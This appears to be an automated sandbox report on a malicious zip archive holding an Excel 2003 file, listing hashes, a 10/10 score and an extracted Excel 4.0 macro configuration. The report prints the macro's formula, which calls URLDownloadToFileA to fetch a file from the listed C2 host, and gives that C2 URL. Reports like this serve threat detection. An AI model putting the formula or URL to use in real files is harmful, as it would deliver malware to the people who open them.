General

  • Target

    this_issue (74).zip

  • Size

    11KB

  • MD5

    bb7b00cde705ee43343e0a0e05182ca3

  • SHA1

    74350d46d4f32913e085de4e797099c6ba7ea5de

  • SHA256

    4d06324eecb613b38d794f04d701378645a28f9e87b1056b95339323c150d93c

  • SHA512

    77e70f0bd3157b7dd5668b3c854a5a9a91dd3c94f1ffd5fda60a01da68de6ac0bfc40c4c936b165cdcc86035f8fdecfb1f292a70e11029b6f46238cd6d6cf37c

Score
10/10

Malware Config

Extracted

Rule
    Excel 4.0 XLM Macro

C2
    http://dzw10jpcgj03fckc.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)

Signatures

  • Suspicious Office macro (1 IoC)

    Office document equipped with 4.0 macros.

Files

  • this_issue (74).zip
    .zip
  • document-630335192.xls
    .xls windows office2003